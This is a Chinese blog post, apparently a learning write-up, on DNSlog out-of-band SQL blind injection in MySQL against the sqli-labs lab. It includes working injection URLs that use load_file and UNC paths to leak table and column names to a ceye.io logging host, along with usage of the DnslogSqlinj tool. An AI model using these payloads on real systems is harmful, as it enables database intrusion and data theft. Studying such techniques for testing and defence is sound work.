mysql dnslog_DNSlog注入踩坑记录:

最新推荐文章于 2022-08-01 22:41:25 发布
最新推荐文章于 2022-08-01 22:41:25 发布
阅读量1k 收藏 6
点赞数 3
文章标签: mysql dnslog
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42503076/article/details/113257049
版权

我遇到了两个巨坑,加上http://ceye.io/,经常无法访问,记录一下心酸的踩坑历史。

直接将两个巨坑放到最前面,提醒后人!!

1. sql盲注,后端数据库用的mysql数据库,说一下用dnslog回显只能用于windows系统,原理就是'\\\\'代表Microsoft Windows通用命名约定(UNC)的文件和目录路径格式利用任何以下扩展存储程序引发DNS地址解析。双斜杠表示网络资源路径多加两个\就是转义了反斜杠。

2. 通过DNSlog盲注需要用的load_file()函数,所以一般得是root权限。show variables like '%secure%';查看load_file()可以读取的磁盘。1、当secure_file_priv为空,就可以读取磁盘的目录。

2、当secure_file_priv为G:\,就可以读取G盘的文件。

3、当secure_file_priv为null,load_file就不能加载文件。

我当初的:直接在centos上进行测试,之后在win10上测试的时候没有使用这个函数进行查看。

直接被自己蠢哭.... ...

通过设置my.ini来配置。secure_file_priv=""就是可以load_flie任意磁盘的文件。

先简单介绍一下原理:关于OOB

out-of-band带外数据(OOB)与inband相反,它是一种通过其他传输方式来窃取数据的技术(例如利用DNS解析协议和电子邮件)。OOB技术通常需要易受攻击的实体生成出站TCP/UDP/ICMP请求,然后允许攻击者泄露数据。OOB攻击的成功基于出口防火墙规则,即是否允许来自易受攻击的系统和外围防火墙的出站请求。而从域名服务器(DNS)中提取数据,则被认为是最隐蔽有效的方法。

DNSlog在Web漏洞利用简单理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过这种方式把想获得的数据外带出来。

这里使用的DNS的原因是:DNS在解析的时候会留下日志,咱们这个就是读取多级域名的解析日志,来获取信息 简单来说就是把信息放在高级域名中,传递到自己这,然后读取日志,获取信息。

上张图:

所以,首先需要一个域名http://abc.com,之后访问xxx.abccom,dns服务会将此解析放入log记录中,之后就可以通过log记录获取之前的查询信息。

这里推荐生成域名的平台http://www.ceye.io,我使用的时候经常连接被重置,不知道为啥

注册完成后

实现条件(如上)

1、SQL盲注、无回显的命令执行、无回显的SSRF 2、只能用于windows系统 3、需要用到mysql中的load_file()函数,在Mysql中,load_file()函数读取一个文件并将其内容作为字符串返回。(不绝对,仅仅只是列举了mysql数据库的函数)

再介绍一下UNCUNC路径

什么是UNC路径?

UNC是一种命名惯例, 主要用于在Microsoft Windows上指定和映射网络驱动器. UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。我们日常常用的网络共享文件就是这个方式。

UNC路径就是类似\softer这样的形式的网络路径。它符合 \servername\sharename 格式,其中 servername 是服务器名,sharename 是共享资源的名称。

目录或文件的 UNC 名称可以包括共享名称下的目录路径,格式为:\servername\sharename\directory\filename。

例如把自己电脑的文件共享,你会获得如下路径,这就是UNC路径

//iZ53sl3r1890u7Z/Users/Administrator/Desktop/111.txt

配置完成后开始注入

这样配置完成后,在数据库中进行测试,dnslog被记录下来的。

使用load_file()这个函数支持对外的读取,所以拼接payload。下面就可以进行愉快的sql注入了

dnslog被记录下来的。

使用load_file()这个函数支持对外的读取,所以拼接payload。下面就可以进行愉快的sql注入了

成功爆出数据库名,下面继续爆数据表名

http://192.168.64.152/sqli-labs/Less-9/?id=-1' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 2,1),'.XXXXX.ceye.io\\abc'))),1,0)--+

继续爆列名

http://192.168.64.152/sqli-labs/Less-9/?id=-1' and if((select load_file(concat('\\\\',(select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 1,1),'.XXXXX.ceye.io\\abc'))),1,0)--+

最后直接爆数据,大功告成!

DNS注入工具:DnslogSqlinj

下载完成后直接解压

will@kali:~$ unzip DnslogSqlinj-master.zip

will@kali:~$ cd DnslogSqlinj-master/

will@kali:~/DnslogSqlinj-master$ ls

checkSql.py checkSql.pyc config.py config.pyc dnslogSql.py README.md

will@kali:~/DnslogSqlinj-master$ vim config.py

注意,这里要修改这两个为你自己的

# DNSlog 设置

APItoken = 'xxxxx'

DNSurl = 'xxx'

修改完成后保存

will@kali:~/DnslogSqlinj-master$ sudo python dnslogSql.py

_______________________________________________________________

_____ _ _____ _

| __ \ | | |_ _| (_)

| | | |_ __ ___| | ___ __ _ | | _ __ _

| | | | '_ \/ __| | / _ \ / _` | | | | '_ \| |

| |__| | | | \__ \ |___| (_) | (_| | _| |_| | | | |

|_____/|_| |_|___/______\___/ \__, | |_____|_| |_| |

__/ | _/ |

|___/ |__/

DnsLog SqlInj Scanner by ADO

Version 1.0

https://github.com/ADOOO/DnslogSqlinj

_______________________________________________________________

Usage: dnslogSql.py [options] -u http://10.1.1.9/sqli-labs/Less-9/?id=1' and ({})--+

Options:

--version show program's version number and exit

-h, --help show this help message and exit

-u URL, --url=URL target include injection

-c, --check task name

-n TASKNAME, --name=TASKNAME

task name

-t THREAD_COUNT, --thread=THREAD_COUNT

thread_count

-i INF, --inf=INF Testing target and Try to get information

--dbs get database

-D DB database name

--tables get table

-T TABLE table name

--columns get column

-C COLUMN column name

--dump get data

根据提示,配置参数,如下

will@kali:~/DnslogSqlinj-master$ sudo python dnslogSql.py -u "http://192.168.64.152/sqli-labs/Less-9/?id=1' and ({})--+"

[!]Testing Target and Try to get current information!

[*]Current user: root@localhost

[*]Current data: security

得到数据库名和用户名(在平台中也能看到记录,但是是数字和一些英文,木有看懂)

继续获取对应数据库下面的数据表

will@kali:~/DnslogSqlinj-master$ sudo python dnslogSql.py -u "http://192.168.64.152/sqli-labs/Less-9/?id=1' and ({})--+" -D "security" --tables

[*]Database:security

[*]Get data count: 4

[*]Data 2: referers

[*]Data 4: users

[*]Data 3: uagents

[*]Data 1: emails

然后继续爆字段,爆数据

PS:写的逻辑有些混乱,web萌新,多多包涵。

参考:还有其他很多DNS log注入​www.jianshu.com496df95f1dc2df9e7dd1e5b63eb98e2a.png

就大概是这样
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
c语言中双反斜杠的作用,有关c语言中的反斜杠 '\'
weixin_33942142的博客
05-16 4063
2020-02-02关键字:反斜杠趣谈稍微懂点编程的同学,甭管是哪种编程语言,都知道甚至是在代码中用过反斜杠。反斜杠这东西的最为人所知的作用就是作为“转义字符”以及“连接符”来使用。例如,常见的正则表达式用途:grep -nr "init*\.rc"以及在 c语言 领域常见的连接代码用途:#define LOG(a,b) do{\printf("[LOG]%d--%d", a, b); \}whi...
mysql提示Changed limits: max_open_files: 2048 max_connections: 1910 table_cache: 64的解决
01-19
windows下安装Mysql系统日志出现max_open_files: 2048 max_connections: 510 table_cache: 764 类似错误是因为 max_connections 最大连接数和max_open_files、table_cache 不匹配。适当的降低max_connections 或...
concat拼接的 mysql_DNSlog注入记录
weixin_39963465的博客
12-28 265
我遇到了两个巨,加上http://ceye.io/,经常无法访问,记录一下心酸的历史。直接将两个巨放到最前面,提醒后人!! 1. sql盲注,后端数据库用的mysql数据库,说一下用dnslog回显只能用于windows系统,原理就是''代表Microsoft Windows通用命名约定(UNC)的文件和目录路径格式利用任何以下扩展存储程序引发DNS地址解析。双斜杠表示网络资源路径多加两个...
unc 通用命名规则
黑鸟酱
02-23 1105
     在网络中,通用命名规则(UNC,Universal Naming Convention)一种辨别一个位于电脑中的共享文件,而不需要指定(和不知道)它的存储设备的方式。在Windows操作系统、Novell NetWare ,以及其他一些可能的操作系统,UNC 都可以用来替代本地命名系统(例如Windows中的DOS命名系统)。       在Windows操作系统中,UNC...
DNSlogSqlinj注入,解决kali2022DNSlogSqlinj报错问题。
qq_60463414的博客
08-01 1241
解决kali2022中DnslogSqlinj工具,在使用中报错问题。
[zkaq靶场]SQL注入--DNS-LOG注入
wwxxee
05-08 233
DNS注入 介绍 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。 所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接
PHP提示Deprecated: mysql_connect(): The mysql extension is deprecated的解决方法
10-25
主要介绍了PHP提示Deprecated: mysql_connect(): The mysql extension is deprecated的解决方法,是在进行PHP数据库程序开发中常会遇到的错误,需要的朋友可以参考下
MySQL复制出错 Last_SQL_Errno:1146的解决方法
09-10
主要介绍了MySQL复制出错 Last_SQL_Errno:1146的解决方法,需要的朋友可以参考下
PHP错误Warning:mysql_query()解决方法
01-21
php提示错误:Warning: mysql_query() [function....function mysqlClass($host='localhost',$user='root',$pw='',$db='mysql') { $this->link=mysql_connect($host,$user,$pw); mysql_select_db($db); } function q
CC++ MySQL篇.rar_MySQL : C++_cc++MySQL_mysql c_mysql c
07-15
CC++ MySQL篇,代码+教程,保证你绝对一看就会
MySQL使用LOAD_FILE()函数方法总结
09-09
在本篇文章里小编给大家分享了关于MySQL使用LOAD_FILE()函数方法和相关知识点,需要的朋友们学习下。
dns mysql_DNSlog实现Mysql注入
weixin_32126033的博客
01-18 126
step1:通过DNSlog盲注需要用到load_file()函数。show variables like '%secure%' 查看load_file()可以读取的磁盘。1、当secure_file_priv为空,就可以读取磁盘的目录。2、当secure_file_priv为G:\,就可以读取G盘的文件。3、当secure_file_priv为null,load_file就不能加载文件。在5.7...
Mssql注入——dns注入,反弹注入
weixin_46601374的博客
02-28 2630
DNS注入 DNS注入原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器记录后查看日志。 load_file函数的作用 用于读取文件内容,并返回输出 load_file函数是什么 load_file 读取文件函数,读取的内容返回为字符串输出。 load_file函数在注入的作用 利用读取注入的报错信息,然后返回报错信息(显
mysql dnslog_DNSlog盲注
weixin_33365844的博客
01-27 300
前言在渗透测试中,经常遇到如下情景:1,sql盲注2,blind型ssrf以及xxe3,无回显命令执行漏洞...dnslog盲注原理开放的DNSlog平台:http://ceye.io/在http://ceye.io/上我们可以获取到有关ceye.io的DNS查询信息。域名解析的过程,是由顶级域名向下逐级解析。我们构造的攻击语句也是如此,当它发现域名中存在ceye.io时,它会将这条域名信息转到相...
记录一个SpringDataJpa使用@Query中concat()的
milo_milo的博客
04-18 2351
今天使用SpringDataJpa是,碰到一个功能,需要要进行数据库两张表的联合模糊多条件查询。 然后我的springboot版本:2.2.5.RELEASE 我知道是使用@Query进行查询,然后网上说是使用concat() where a.pname like concat('%',:pname,'%') and b.uname like concat('%',:uname,'%') 这种...
Oracle外部表ORACLE_LOADER类型的创建语法详解
czmmiao的专栏
11-20 2359
This chapter describes the access parameters for the default external tables access driver, ORACLE_LOADER . You specify these access parameters when you create the external table. To use the informa...
【渗透测试】DNSLog注入
ssrf
10-25 3719
目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、p
concat拼接字段注意躲避空值
yjgithub的博客
01-17 8982
select concat(t1.clo1,t1.clo2,t1.clo3) from tableName t1; select concat(nvl(t1.clo1,''),nvl(t1.clo2,''),nvl(t1.clo3,'')) from tableName t1; 如果三个字段都不为空,可以直接使用第一个语句获取拼接字段 若三个字段中包含空值,则使用第一个语句获取的拼接字段为空值,...
每天一个lodash方法-concat
weixin_33912445的博客
03-28 1261
腱鞘炎犯了。第三天就没坚持住,罪过罪过。 concat源码链接 功能 创建一个用任何数组 或 值连接的新数组。 使用方法 * var array = [1]; * var other = _.concat(array, 2, [3], [[4]]); * * console.log(other); * // => [1, ...
version: '3' services: web: image: php:apache ports: - "80:80" volumes: - ./web:/var/www/html depends_on: - db db: image: mysql environment: MYSQL_DATABASE: testdb MYSQL_USER: root MYSQL_PASSWORD: 2111800Aa2315600@ MYSQL_ROOT_PASSWORD: 2111800Aa2315600@
最新发布
06-07
你的docker-compose.yml文件看起来格式正确,但是我注意到你在环境变量的值中使用了特殊字符,比如“@”符号。这些特殊字符可能会导致解析错误,尤其是在使用yaml格式时。你可以尝试将这些特殊字符转义,例如使用反斜杠“\”或将整个值用双引号括起来。例如: ``` version: '3' services: web: image: php:apache ports: - "80:80" volumes: - ./web:/var/www/html depends_on: - db db: image: mysql environment: MYSQL_DATABASE: testdb MYSQL_USER: root MYSQL_PASSWORD: "2111800Aa2315600@" MYSQL_ROOT_PASSWORD: "2111800Aa2315600@" ``` 尝试修改后,重新运行docker-compose命令,看看是否解决了问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值